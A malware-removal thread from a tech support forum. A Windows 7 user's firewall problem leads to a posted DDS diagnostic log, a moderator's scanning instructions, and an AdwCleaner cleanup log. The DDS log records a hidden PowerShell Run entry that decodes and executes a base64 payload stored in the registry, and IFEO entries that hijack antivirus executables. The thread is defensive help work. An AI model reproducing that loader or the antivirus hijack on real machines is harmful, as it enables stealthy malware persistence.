Not working correctly Windows Firewall

Old 10-13-2016, 08:18 AM   #1
Registered Member
 
Join Date: Oct 2016
Posts: 31
OS: windows 7 service pack 1



My issue is as follows: a few weeks ago, maybe even months, I noticed that my firewall would turn on without me knowing and ask to let the program through. The reason I didn't have the firewall turned on at the time was because the firewall would turn a few-minute process into a few hours. Some time later the firewall would start asking to let through programs like Steam, Origin, and games from Steam and Origin. These programs I have used before, so I knew right away there was something wrong. A few weeks later the firewall stopped blocking programs even when it did ask for permission. I noticed that it stopped because before, when I got the prompt, the program would not have full internet access and would be slower. Now I am asking for a fix since it is NOT working correctly: only a few days ago it started blocking again, 2 days later it stopped, and now it is not.
I have made a thread where the person helping me simply told me to go here. This issue has been quite annoying.
P.S. I do not have access to the Windows or boot CD.
link to the thread:
hxxp://www.techsupportforum.com/forums/f112/windows-firewall-not-working-correctly-1161473.html#post7240897

The log will be attached below because I wasn't sure if I should place the DDS one here or attach it. The attach.txt will also be attached below in case you need it.

DDS (Ver_2012-11-20.01) - NTFS_x86
Internet Explorer: 11.0.9600.18500 BrowserJavaVersion: 11.91.2
Run by violeta at 16:52:43 on 2016-10-13
Microsoft Windows 7 Professional 6.1.7601.1.1252.1.1033.18.2013.1231 [GMT 2:00]
.
AV: Trend Micro Titanium Internet Security *Disabled/Outdated* {68F968AC-2AA0-091D-848C-803E83E35902}
SP: Trend Micro Titanium Internet Security *Disabled/Outdated* {D3988948-0C9A-0693-BE3C-BB4CF86413BF}
SP: Windows Defender *Enabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
============== Running Processes ================
.
C:\Windows\system32\wininit.exe
C:\Windows\system32\lsm.exe
C:\Windows\System32\spoolsv.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\Program Files\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe
C:\Program Files\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe
C:\Program Files\Hi-Rez Studios\HiPatchService.exe
C:\Program Files\Common Files\Microsoft Shared\Phone Tools\CoreCon\11.0\bin\IpOverUsbSvc.exe
C:\Program Files\LogMeIn Hamachi\LMIGuardianSvc.exe
C:\Windows\system32\PnkBstrA.exe
C:\Program Files\Razer\Razer Services\GSS\GameScannerService.exe
C:\Program Files\Razer\Razer Cortex\RzKLService.exe
C:\Program Files\ShadowExplorer\sesvc.exe
C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
C:\Program Files\Alcohol Soft\Alcohol 120\StarWind\StarWindServiceAE.exe
C:\Program Files\TeamViewer\TeamViewer_Service.exe
C:\ProgramData\Telenor Internet\OnlineUpdate\ouc.exe
C:\Program Files\TunnelBear\TBear.Maintenance.exe
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
C:\Program Files\LogMeIn Hamachi\hamachi-2.exe
C:\Windows\system32\wbem\wmiprvse.exe
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSvcM.exe
C:\Windows\system32\Dwm.exe
C:\Windows\Explorer.EXE
C:\Windows\system32\taskhost.exe
C:\Windows\system32\SearchIndexer.exe
C:\Program Files\Windows Media Player\wmpnetwk.exe
C:\Windows\Microsoft.Net\Framework\v3.0\WPF\PresentationFontCache.exe
C:\Windows\servicing\TrustedInstaller.exe
C:\Program Files\Microsoft\BingBar\7.1.362.0\SeaPort.exe
C:\Windows\system32\wuauclt.exe
C:\Windows\System32\WUDFHost.exe
C:\Windows\system32\taskhost.exe
C:\Windows\system32\msiexec.exe
C:\Windows\system32\sppsvc.exe
C:\Windows\system32\vssvc.exe
C:\Windows\system32\SearchProtocolHost.exe
C:\Windows\system32\SearchFilterHost.exe
C:\Windows\system32\conhost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe -k GPSvcGroup
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Windows\system32\svchost.exe -k imgsvc
C:\Windows\System32\svchost.exe -k secsvcs
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
C:\Windows\system32\svchost.exe -k SDRSVC
C:\Windows\System32\svchost.exe -k swprv
.
============== Pseudo HJT Report ===============
.
uDefault_Page_URL = about:blank
mStart Page = about:blank
mDefault_Page_URL = about:blank
uWindows: Load = c:\windows\system32\Microsoft.com
uRun: [AlcoholAutomount] "c:\program files\alcohol soft\alcohol 120\axcmd.exe" /automount
uRun: [{57E0064B-6CDF-4014-A8FF-F401291F5488}] c:\windows\system32\windowspowershell\v1.0\powershell.exe -noprofile -windowstyle hidden -executionpolicy bypass iex ([text.encoding]::ascii.getstring([convert]::frombase64string((gp 'hkcu:\software\classes\NYQUMMEV').KgJaKWdyhxnot)));
mRun: [IgfxTray] c:\windows\system32\igfxtray.exe
mRun: [HotKeysCmds] c:\windows\system32\hkcmd.exe
mRun: [Persistence] c:\windows\system32\igfxpers.exe
mRun: [SunJavaUpdateSched] "c:\program files\common files\java\java update\jusched.exe"
mRun: [LogMeIn Hamachi Ui] "c:\program files\logmein hamachi\hamachi-2-ui.exe" --auto-start
mRun: [Lightshot] c:\program files\skillbrains\lightshot\Lightshot.exe
dRunOnce: [SPReview] "c:\windows\system32\spreview\SPReview.exe" /sp:1 /errorfwlink:"https://go.microsoft.com/fwlink/?LinkID=122915" /build:7601
dRunOnce: [SpUninstallDeleteDir] rmdir /s /q "\SearchProtect"
StartupFolder: c:\users\violeta\appdata\roaming\microsoft\windows\start menu\programs\startup\Registration RAYMAN
mPolicies-Explorer: NoDriveTypeAutoRun = dword:221
mPolicies-Explorer: HideSCAHealth = dword:1
mPolicies-System: ConsentPromptBehaviorAdmin = dword:5
mPolicies-System: ConsentPromptBehaviorUser = dword:3
mPolicies-System: EnableUIADesktopToggle = dword:0
mPolicies-Explorer: HideSCAHealth = dword:1
IE: E&xport to Microsoft Excel - c:\progra~1\micros~1\office12\EXCEL.EXE/3000
Trusted Zone: clonewarsadventures.com
Trusted Zone: freerealms.com
Trusted Zone: soe.com
Trusted Zone: sony.com
TCP: Interfaces\{5A19095F-7933-4DA1-AD09-19E979DC22C7} : NameServer = 217.65.192.101 217.65.192.102
TCP: Interfaces\{79289764-7478-4021-A6D0-8EAF6EFDDD53} : DHCPNameServer = 192.168.1.1
TCP: Interfaces\{79976A8E-F478-4642-88DD-27DD71B01DC2} : DHCPNameServer = 172.18.12.1
TCP: Interfaces\{9F6CCFF6-FC61-4F75-BD9A-39A7BE019C6E} : NameServer = 217.65.192.101 217.65.192.102
TCP: Interfaces\{C2E0376F-F85D-46E3-80E2-201AFBF0F518} : NameServer = 217.65.192.101 217.65.192.102
Handler: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - c:\program files\microsoft office\office12\GrooveSystemServices.dll
Handler: skype-ie-addon-data - {91774881-D725-4E58-B298-07617B9B86A8} - c:\program files\skype\toolbars\internet explorer\SkypeIEPlugin.dll
Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - c:\program files\common files\skype\Skype4COM.dll
Handler: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - c:\program files\skype\toolbars\internet explorer\SkypeIEPlugin.dll
Handler: tmbp - {1A77E7DC-C9A0-4110-8A37-2F36BAE71ECF} - c:\program files\trend micro\amsp\module\20002\6.6.1010\6.6.1010\TmBpIe32.dll
Handler: tmpx - {0E526CB5-7446-41D1-A403-19BFE95E8C23} - c:\program files\trend micro\amsp\module\20004\1.5.1504\6.6.1088\TmIEPlg.dll
Handler: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - c:\program files\windows live\photo gallery\AlbumDownloadProtocolHandler.dll
Notify: igfxcui - igfxdev.dll
SSODL: WebCheck - <orphaned>
SEH: Groove GFS Stub Execution Hook - {B5A7F190-DDA6-4420-B3BA-52453494E6CD} - c:\program files\microsoft office\office12\GrooveShellExtensions.dll
IFEO: AvastSvc.exe - c:\windows\system32\Microsoft.com
IFEO: AvastUI.exe - c:\windows\system32\Microsoft.com
IFEO: avcenter.exe - c:\windows\system32\Microsoft.com
IFEO: avconfig.exe - c:\windows\system32\Microsoft.com
IFEO: avgcsrvx.exe - c:\windows\system32\Microsoft.com
.
Note: multiple IFEO entries found. Please refer to Attach.txt
.
================= FIREFOX ===================
.
FF - ProfilePath - c:\users\violeta\appdata\roaming\mozilla\firefox\profiles\pgyttybc._\
FF - plugin: c:\program files\foxit software\foxit reader\plugins\npFoxitReaderPlugin.dll
FF - plugin: c:\program files\google\google earth\plugin\npgeplugin.dll
FF - plugin: c:\program files\google\update\1.3.31.5\npGoogleUpdate3.dll
FF - plugin: c:\program files\heroes & generals\live\npretox-1.0.6.1\npretoxlive-1.0.6.1.dll
FF - plugin: c:\program files\java\jre1.8.0_91\bin\dtplugin\npdeployJava1.dll
FF - plugin: c:\program files\java\jre1.8.0_91\bin\plugin2\npjp2.dll
FF - plugin: c:\program files\microsoft silverlight\5.1.50901.0\npctrlui.dll
FF - plugin: c:\program files\ubisoft\ubisoft game launcher\npuplaypc.dll
FF - plugin: c:\program files\ubisoft\ubisoft game launcher\npuplaypchub.dll
FF - plugin: c:\program files\windows live\photo gallery\NPWLPG.dll
FF - plugin: c:\programdata\happycloud\application\npHappyCloudPlugin.dll
FF - plugin: c:\programdata\nexonus\ngm\npNxGameUS.dll
FF - plugin: c:\users\violeta\appdata\locallow\unity\webplayer\loader\npUnity3D32.dll
FF - plugin: c:\windows\system32\adobe\director\np32dsw_1213153.dll
FF - plugin: c:\windows\system32\macromed\flash\NPSWF32_23_0_0_162.dll
.
============= SERVICES / DRIVERS ===============
.
P2 HiPatchService;Hi-Rez Studios Authenticate and Update Service;c:\program files\hi-rez studios\HiPatchService.exe [2016-9-18 9728]
R2 c2cautoupdatesvc;Skype Click to Call Updater;c:\program files\skype\toolbars\autoupdate\SkypeC2CAutoUpdateSvc.exe [2016-5-25 1364096]
R2 c2cpnrsvc;Skype Click to Call PNR Service;c:\program files\skype\toolbars\pnrsvc\SkypeC2CPNRSvc.exe [2016-5-25 1687680]
R2 Hamachi2Svc;LogMeIn Hamachi Tunneling Engine;c:\program files\logmein hamachi\hamachi-2.exe [2016-9-13 1958408]
R2 IntelHaxm;Intel HAXM Service;c:\windows\system32\drivers\IntelHaxm.sys [2016-3-12 78848]
R2 IpOverUsbSvc;Windows Phone IP over USB Transport (IpOverUsbSvc);c:\program files\common files\microsoft shared\phone tools\corecon\11.0\bin\IpOverUsbSvc.exe [2014-4-17 22768]
R2 LMIGuardianSvc;LMIGuardianSvc;c:\program files\logmein hamachi\LMIGuardianSvc.exe [2016-8-31 405424]
R2 Razer Game Scanner Service;Razer Game Scanner;c:\program files\razer\razer services\gss\GameScannerService.exe [2015-8-15 188072]
R2 RzKLService;RzKLService;c:\program files\razer\razer cortex\RzKLService.exe [2015-5-2 129168]
R2 rzpmgrk;rzpmgrk;c:\windows\system32\drivers\rzpmgrk.sys [2015-5-2 20288]
R2 sesvc;ShadowExplorer Service;c:\program files\shadowexplorer\sesvc.exe [2015-9-1 9216]
R2 StarWindServiceAE;StarWind AE Service;c:\program files\alcohol soft\alcohol 120\starwind\StarWindServiceAE.exe [2007-5-28 275968]
R2 TeamViewer;TeamViewer 11;c:\program files\teamviewer\TeamViewer_Service.exe [2015-8-3 6889232]
R2 tmevtmgr;tmevtmgr;c:\windows\system32\drivers\tmevtmgr.sys [2012-1-6 64080]
R2 TunnelBearMaintenance;TunnelBear Maintenance;c:\program files\tunnelbear\TBear.Maintenance.exe [2016-5-11 41472]
R3 BBUpdate;BBUpdate;c:\program files\microsoft\bingbar\7.1.362.0\SeaPort.EXE [2012-2-13 240408]
R3 EvolveVirtualAdapter;Evolve Virtual Miniport Driver;c:\windows\system32\drivers\evolve.sys [2013-6-12 18584]
R3 huawei_enumerator;huawei_enumerator;c:\windows\system32\drivers\ew_jubusenum.sys [2011-12-19 73216]
R3 L1C;NDIS Miniport Driver for Atheros AR8131/AR8132 PCI-E Ethernet Controller (NDIS 6.20);c:\windows\system32\drivers\L1C62x86.sys [2009-6-10 50688]
R3 tap-tb-0901;TunnelBear Adapter V9;c:\windows\system32\drivers\tap-tb-0901.sys [2015-8-10 33280]
R3 XSplit_Dummy;XSplit Stream Audio Renderer;c:\windows\system32\drivers\xspltspk.sys [2014-7-2 22104]
R3 zttap200;ZeroTier One Virtual Network Port;c:\windows\system32\drivers\zttap200.sys [2014-11-20 28824]
S2 Amsp;Trend Micro Solution Platform;c:\program files\trend micro\amsp\coreServiceShell.exe [2012-1-6 188272]
S2 BBSvc;BingBar Service;c:\program files\microsoft\bingbar\7.1.362.0\BBSvc.EXE [2012-2-13 193816]
S2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86;c:\windows\microsoft.net\framework\v4.0.30319\mscorsvw.exe [2015-11-5 105144]
S2 HWDeviceService.exe;HWDeviceService.exe;"c:\programdata\datacardservice\hwdeviceservice.exe" -/service --> c:\programdata\datacardservice\HWDeviceService.exe [?]
S2 Origin Web Helper Service;Origin Web Helper Service;c:\program files\origin\OriginWebHelperService.exe [2016-9-15 2209296]
S2 Skype C2C Service;Skype C2C Service;c:\programdata\skype\toolbars\skype c2c service\c2c_service.exe [2012-5-30 3048136]
S2 SkypeUpdate;Skype Updater;c:\program files\skype\updater\Updater.exe [2016-5-23 324224]
S2 Telenor Internet. RunOuc;Telenor Internet. OUC;c:\program files\telenor internet\updatedog\ouc.exe [2011-12-19 246112]
S3 b57nd60x;Broadcom NetXtreme Gigabit Ethernet - NDIS 6.0;c:\windows\system32\drivers\b57nd60x.sys [2009-7-14 229888]
S3 BroadcomWModem;Broadcom Corporation BroadcomWModem;c:\windows\system32\drivers\bcmww.sys [2005-6-2 118400]
S3 c2wts;Claims to Windows Token Service;c:\program files\windows identity foundation\v3.5\c2wtshost.exe [2014-10-8 15768]
S3 DrvAgent32;DrvAgent32;c:\windows\system32\drivers\DrvAgent32.sys [2014-12-11 23456]
S3 EvoSvc;Evolve Service;c:\program files\echobit\evolve\EvoSvc.exe [2015-8-18 1583488]
S3 ew_hwusbdev;Huawei MobileBroadband USB PNP Device;c:\windows\system32\drivers\ew_hwusbdev.sys [2011-12-19 102784]
S3 ew_usbenumfilter;huawei_CompositeFilter;c:\windows\system32\drivers\ew_usbenumfilter.sys [2011-12-19 11136]
S3 ewusbmbb;HUAWEI USB-WWAN miniport;c:\windows\system32\drivers\ewusbwwan.sys [2011-12-19 353280]
S3 fssfltr;fssfltr;c:\windows\system32\drivers\fssfltr.sys [2012-9-4 49088]
S3 fsssvc;Windows Live Family Safety Service;c:\program files\windows live\family safety\fsssvc.exe [2012-7-28 1511872]
S3 IEEtwCollectorService;Internet Explorer ETW Collector Service;c:\windows\system32\ieetwcollector.exe [2016-10-12 102912]
S3 MBAMProtector;MBAMProtector;c:\windows\system32\drivers\mbam.sys [2014-2-8 22856]
S3 mvusbews;USB EWS Device;c:\windows\system32\drivers\mvusbews.sys [2012-12-24 17408]
S3 npggsvc;nProtect GameGuard Service;c:\windows\system32\gamemon.des -service --> c:\windows\system32\GameMon.des -service [?]
S3 Origin Client Service;Origin Client Service;c:\program files\origin\OriginClientService.exe [2016-9-15 2142728]
S3 OverwolfUpdater;Overwolf Updater Windows SCM;c:\program files\overwolf\OverwolfUpdater.exe [2016-8-29 1310448]
S3 RdpVideoMiniport;Remote Desktop Video Miniport Driver;c:\windows\system32\drivers\rdpvideominiport.sys [2015-8-24 14848]
S3 StorSvc;Storage Service;c:\windows\system32\svchost.exe -k LocalSystemNetworkRestricted [2009-7-14 20992]
S3 Te.Service;Te.Service;c:\program files\windows kits\8.1\testing\runtimes\taef\Wex.Services.exe [2013-8-21 91136]
S3 TsUsbFlt;TsUsbFlt;c:\windows\system32\drivers\TsUsbFlt.sys [2015-8-24 49152]
S3 VsEtwService120;Visual Studio ETW Event Collection Service;c:\program files\microsoft visual studio 12.0\common7\packages\debugger\services\VsEtwService.exe [2014-7-23 73360]
S3 VSStandardCollectorService140;Visual Studio Standard Collector Service;c:\program files\microsoft visual studio 14.0\team tools\diagnosticshub\collector\StandardCollector.Service.exe [2016-3-22 48872]
.
=============== File Associations ===============
.
FileExt: .js: Applications\notepad++.exe="c:\program files\notepad++\notepad++.exe" "%1" [UserChoice]
.
=============== Created Last 30 ================
.
2016-10-13 12:14:31 62576 ----a-w- c:\programdata\microsoft\windows defender\definition updates\{1b03c628-ca8d-470f-8393-bca3279c2538}\offreg.3268.dll
2016-10-12 13:13:07 -------- d-----w- c:\program files\Skillbrains
2016-10-12 11:55:59 815304 ----a-w- c:\program files\internet explorer\iexplore.exe
2016-10-11 14:14:37 62576 ----a-w- c:\programdata\microsoft\windows defender\definition updates\{1b03c628-ca8d-470f-8393-bca3279c2538}\offreg.3732.dll
2016-10-11 07:25:22 9837072 ----a-w- c:\programdata\microsoft\windows defender\definition updates\{1b03c628-ca8d-470f-8393-bca3279c2538}\mpengine.dll
2016-10-06 15:17:22 -------- d-----w- c:\users\violeta\appdata\roaming\Duelyst
2016-09-21 06:47:47 2048 ----a-w- c:\windows\system32\tzres.dll
2016-09-19 18:35:27 -------- d-----w- c:\users\violeta\appdata\local\{26E83D09-9D35-755D-7492-57CF5473C38A}
2016-09-18 19:36:50 -------- d-----w- c:\users\violeta\appdata\local\HirezLauncherUI
2016-09-18 19:31:39 -------- d-----w- c:\program files\Hi-Rez Studios
2016-09-18 14:19:06 -------- d-----w- c:\users\violeta\appdata\roaming\.minecraft
2016-09-15 13:51:48 -------- d-----w- c:\users\violeta\.QtWebEngineProcess
2016-09-15 13:51:46 -------- d-----w- c:\users\violeta\.Origin
2016-09-14 04:52:22 -------- d-----w- c:\program files\LogMeIn Hamachi
.
==================== Find3M ====================
.
2016-09-30 15:20:30 4000488 ----a-w- c:\windows\system32\ntkrnlpa.exe
2016-09-30 15:20:30 3944680 ----a-w- c:\windows\system32\ntoskrnl.exe
2016-09-30 05:54:40 2724864 ----a-w- c:\windows\system32\mshtml.tlb
2016-09-30 05:54:29 4096 ----a-w- c:\windows\system32\ieetwcollectorres.dll
2016-09-30 05:42:47 498688 ----a-w- c:\windows\system32\vbscript.dll
2016-09-30 05:42:45 62464 ----a-w- c:\windows\system32\iesetup.dll
2016-09-30 05:42:09 47616 ----a-w- c:\windows\system32\ieetwproxystub.dll
2016-09-30 05:42:01 341504 ----a-w- c:\windows\system32\html.iec
2016-09-30 05:41:14 64000 ----a-w- c:\windows\system32\MshtmlDac.dll
2016-09-30 05:32:43 102912 ----a-w- c:\windows\system32\ieetwcollector.exe
2016-09-30 05:32:38 115712 ----a-w- c:\windows\system32\ieUnatt.exe
2016-09-30 05:32:21 620032 ----a-w- c:\windows\system32\jscript9diag.dll
2016-09-30 05:27:34 667648 ----a-w- c:\windows\system32\MsSpellCheckingFacility.exe
2016-09-30 05:19:54 60416 ----a-w- c:\windows\system32\JavaScriptCollectionAgent.dll
2016-09-30 05:12:59 4608512 ----a-w- c:\windows\system32\jscript9.dll
2016-09-30 05:05:17 2055680 ----a-w- c:\windows\system32\inetcpl.cpl
2016-09-30 05:05:00 1155072 ----a-w- c:\windows\system32\mshtmlmedia.dll
2016-09-30 04:46:52 2444288 ----a-w- c:\windows\system32\wininet.dll
2016-09-24 08:29:15 47920 ----a-w- c:\windows\system32\partizan.exe
2016-09-15 15:15:01 84480 ----a-w- c:\windows\system32\INETRES.dll
2016-09-15 15:15:01 741888 ----a-w- c:\windows\system32\inetcomm.dll
2016-09-14 07:30:06 796352 ----a-w- c:\windows\system32\FlashPlayerApp.exe
2016-09-14 07:30:06 142528 ----a-w- c:\windows\system32\FlashPlayerCPLApp.cpl
2016-09-13 16:53:44 27040 ---ha-w- c:\windows\system32\hamachi.sys
2016-09-12 20:54:23 67816 ----a-w- c:\windows\system32\CompatTelRunner.exe
2016-09-12 20:53:41 67304 ----a-w- c:\windows\system32\drivers\ksecdd.sys
2016-09-12 20:53:41 137960 ----a-w- c:\windows\system32\drivers\ksecpkg.sys
2016-09-12 20:29:45 50176 ----a-w- c:\windows\system32\auditpol.exe
2016-09-12 20:28:41 2399232 ----a-w- c:\windows\system32\win32k.sys
2016-09-12 20:26:06 226304 ----a-w- c:\windows\system32\drivers\mrxsmb10.sys
2016-09-12 20:26:04 98304 ----a-w- c:\windows\system32\drivers\mrxsmb20.sys
2016-09-12 20:26:00 124416 ----a-w- c:\windows\system32\drivers\mrxsmb.sys
2016-09-12 20:25:30 36352 ----a-w- c:\windows\system32\cryptbase.dll
2016-09-12 20:25:29 22016 ----a-w- c:\windows\system32\lsass.exe
2016-09-12 20:25:29 15872 ----a-w- c:\windows\system32\sspisrv.dll
2016-09-12 19:08:46 909824 ----a-w- c:\windows\system32\FntCache.dll
2016-09-12 19:08:46 1251328 ----a-w- c:\windows\system32\DWrite.dll
2016-09-10 15:53:43 2291712 ----a-w- c:\windows\system32\MSVidCtl.dll
2016-09-09 18:01:23 1310528 ----a-w- c:\windows\system32\ntdll.dll
2016-09-09 18:00:00 43008 ----a-w- c:\windows\system32\srclient.dll
2016-09-09 18:00:00 400896 ----a-w- c:\windows\system32\srcore.dll
2016-09-09 17:59:58 50176 ----a-w- c:\windows\system32\setbcdlocale.dll
2016-09-09 17:59:47 38912 ----a-w- c:\windows\system32\csrsrv.dll
2016-09-09 17:59:46 6656 ----a-w- c:\windows\system32\apisetschema.dll
2016-09-09 17:59:46 644096 ----a-w- c:\windows\system32\advapi32.dll
2016-09-09 17:59:46 50688 ----a-w- c:\windows\system32\appidapi.dll
2016-09-09 17:42:07 97792 ----a-w- c:\windows\system32\appidpolicyconverter.exe
2016-09-09 17:42:05 50688 ----a-w- c:\windows\system32\drivers\appid.sys
2016-09-09 17:42:05 16896 ----a-w- c:\windows\system32\appidcertstorecheck.exe
2016-09-09 17:42:04 29696 ----a-w- c:\windows\system32\appidsvc.dll
2016-09-09 17:39:47 262656 ----a-w- c:\windows\system32\rstrui.exe
2016-09-09 17:37:25 69632 ----a-w- c:\windows\system32\smss.exe
2016-09-09 15:53:28 488448 ----a-w- c:\windows\system32\devinv.dll
2016-09-09 15:53:28 478208 ----a-w- c:\windows\system32\generaltel.dll
2016-09-09 15:53:28 268800 ----a-w- c:\windows\system32\invagent.dll
2016-09-09 15:53:28 213504 ----a-w- c:\windows\system32\centel.dll
2016-09-09 15:53:27 184320 ----a-w- c:\windows\system32\aepic.dll
2016-09-09 15:53:27 1406976 ----a-w- c:\windows\system32\appraiser.dll
2016-09-09 15:53:27 107008 ----a-w- c:\windows\system32\acmigration.dll
2016-09-08 20:34:14 208896 ----a-w- c:\windows\system32\WebClnt.dll
2016-09-08 20:34:01 87040 ----a-w- c:\windows\system32\davclnt.dll
2016-09-08 14:49:59 117248 ----a-w- c:\windows\system32\drivers\mrxdav.sys
2016-09-08 14:49:56 81408 ----a-w- c:\windows\system32\drivers\dfsc.sys
2016-08-29 15:12:38 1499648 ----a-w- c:\windows\system32\ExplorerFrame.dll
2016-08-29 15:12:35 1806848 ----a-w- c:\windows\system32\authui.dll
2016-08-29 14:55:07 2972672 ----a-w- c:\windows\explorer.exe
2016-08-16 20:42:13 3072 ----a-w- c:\windows\system32\drivers\en-us\usbehci.sys.mui
2016-08-16 20:42:12 11776 ----a-w- c:\windows\system32\drivers\en-us\usbhub.sys.mui
2016-08-16 20:41:57 24576 ----a-w- c:\windows\system32\drivers\en-us\usbport.sys.mui
2016-08-16 20:27:20 259072 ----a-w- c:\windows\system32\drivers\usbhub.sys
2016-08-16 20:27:02 76288 ----a-w- c:\windows\system32\drivers\usbccgp.sys
2016-08-16 20:26:59 46592 ----a-w- c:\windows\system32\drivers\usbehci.sys
2016-08-16 20:26:59 285696 ----a-w- c:\windows\system32\drivers\usbport.sys
2016-08-16 20:26:58 20480 ----a-w- c:\windows\system32\drivers\usbohci.sys
2016-08-16 20:26:56 24576 ----a-w- c:\windows\system32\drivers\usbuhci.sys
2016-08-16 20:26:55 6016 ----a-w- c:\windows\system32\drivers\usbd.sys
2016-08-16 02:48:13 811520 ----a-w- c:\windows\system32\user32.dll
2016-08-12 16:47:20 12574208 ----a-w- c:\windows\system32\wmploc.DLL
2016-08-12 16:46:55 2560 ----a-w- c:\windows\apppatch\AcRes.dll
2016-08-12 16:31:37 4096 ----a-w- c:\windows\system32\msdxm.ocx
2016-08-12 16:31:37 4096 ----a-w- c:\windows\system32\dxmasf.dll
2016-08-12 16:31:35 8192 ----a-w- c:\windows\system32\spwmp.dll
2016-08-12 16:21:28 437248 ----a-w- c:\windows\system32\scavengeui.dll
2016-08-12 16:21:11 310784 ----a-w- c:\windows\system32\drivers\srv.sys
2016-08-12 16:21:05 313856 ----a-w- c:\windows\system32\drivers\srv2.sys
2016-08-12 16:21:01 116224 ----a-w- c:\windows\system32\drivers\srvnet.sys
2016-08-06 15:15:08 54272 ----a-w- c:\windows\system32\WsmRes.dll
2016-08-06 15:15:08 249344 ----a-w- c:\windows\system32\WSManMigrationPlugin.dll
2016-08-06 15:15:08 214016 ----a-w- c:\windows\system32\WsmWmiPl.dll
2016-08-06 15:15:08 146944 ----a-w- c:\windows\system32\WsmAuto.dll
2016-08-06 15:15:08 1178112 ----a-w- c:\windows\system32\WsmSvc.dll
2016-08-06 15:15:01 581632 ----a-w- c:\windows\system32\oleaut32.dll
2016-08-06 14:53:18 12288 ----a-w- c:\windows\system32\wsmprovhost.exe
2016-08-06 14:53:17 199168 ----a-w- c:\windows\system32\WSManHTTPConfig.exe
2016-08-06 14:53:16 10240 ----a-w- c:\windows\system32\wsmplpxy.dll
2016-08-04 06:50:40 282624 --sha-w- c:\users\violeta\spopoi.exe
2016-07-26 12:24:26 406184 ------w- c:\windows\system32\MpSigStub.exe
2016-07-22 14:51:37 123904 ----a-w- c:\windows\system32\poqexec.exe
2016-03-13 13:32:02 3120771 ----a-w- c:\program files\common files\4gzl5t3d.exe
2016-03-12 10:24:11 3170418 ----a-w- c:\program files\common files\kqhpkjmf.exe
2010-11-05 01:58:03 32768 --sha-r- c:\windows\system32\Microsoft.com
.
============= FINISH: 17:02:57.87 ===============
Attached Files
File Type: txt attach.txt (30.7 KB, 359 views)
File Type: txt dds.txt (22.7 KB, 28 views)
nikolap is offline  
Old 10-14-2016, 10:59 AM   #2
Security Team
Moderator, Analyst
Rangemaster, TSF Academy
 
Microsoft Most Valuable Professional
 
Join Date: Oct 2007
Location: Georgia
Posts: 29,790
OS: XP/Win7/Win10



Hello and Welcome to TSF.

If you haven't already, please Subscribe to this Thread to get immediate notification of replies as soon as they are posted. To do this click Thread Tools, then click Subscribe to this Thread. Make sure it is set to Instant notification by email, then click Add Subscription.

Please note that the forum is very busy and if I don't hear from you within three days this thread will be closed.

------------------------------------------------------

**Note - Please do NOT upgrade your OS to Windows 10 until your machine is clean, and we have uninstalled all our removal tools. Thanks.

------------------------------------------------------

Please download AdwCleaner from here and save it to your desktop.
  • Run AdwCleaner and select Scan
  • Once the Scan is done, select Clean
  • Once done it will ask to reboot, please allow the reboot.
  • On reboot, a log will be produced. It can also be found at C:\AdwCleaner\AdwCleaner[C#].txt
  • Please copy/paste the contents of the log in your next reply.
------------------------------------------------------

Please download Farbar Recovery Scan Tool and save it to your desktop.
  • Double-click to run it. When the tool opens click Yes to the disclaimer.
  • Make sure the Addition.txt button is ticked.
  • Press Scan button.
  • It will make a log (FRST.txt) in the same directory the tool is run. Please copy and paste it to your reply.
  • The first time the tool is run, it also makes another log (Addition.txt). Please attach it to your reply.
------------------------------------------------------

Check for additional security risks:
  • Please download CKScanner© by askey127 and save it to your desktop.
  • Double-click on CKScanner.exe and click Search For Files.
  • After a very short time, when the cursor hourglass disappears, click Save List To File. You will be prompted, just click OK.
  • Post the contents of ckfiles.txt in your next reply. It is located on your desktop.
------------------------------------------------------
chemist is offline  
Old 10-14-2016, 10:20 PM   #3
Registered Member
 
Join Date: Oct 2016
Posts: 31
OS: windows 7 service pack 1



The AdwCleaner log:
# AdwCleaner v6.021 - Logfile created 14/10/2016 at 22:04:06
# Updated on 06/10/2016 by ToolsLib
# Database : 2016-10-14.1 [Server]
# Operating System : Windows 7 Professional Service Pack 1 (X86)
# Username : violeta - NIKOLA-PC
# Running from : C:\Users\violeta\Downloads\AdwCleaner.exe
# Mode: Clean
# Support : https://toolslib.net/forum



***** [ Services ] *****

[-] Service deleted: DrvAgent32


***** [ Folders ] *****

[-] Folder deleted: C:\Users\violeta\AppData\Local\VirtualStore\Program Files\1ClickDownload
[-] Folder deleted: C:\Users\violeta\AppData\Local\VirtualStore\Program Files\tencent
[#] Folder deleted on reboot: C:\Users\violeta\AppData\Local\VirtualStore\Program Files\Tencent
[-] Folder deleted: C:\Users\violeta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Plants Vs Zombies
[-] Folder deleted: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Plants Vs Zombies
[-] Folder deleted: C:\Program Files\Plants Vs Zombies
[-] Folder deleted: C:\Program Files\Common Files\freemake shared
[-] Folder deleted: C:\Users\violeta\AppData\Local\Geckofx


***** [ Files ] *****

[-] File deleted: C:\END
[-] File deleted: C:\Windows\system32\findit.xml
[-] File deleted: C:\Windows\system32\drivers\DrvAgent32.sys
[-] File deleted: C:\Users\violeta\AppData\Roaming\appdataFr2.bin
[-] File deleted: C:\Users\violeta\AppData\Roaming\Mozilla\Firefox\Profiles\pgyttybc._\searchplugins\findit.xml


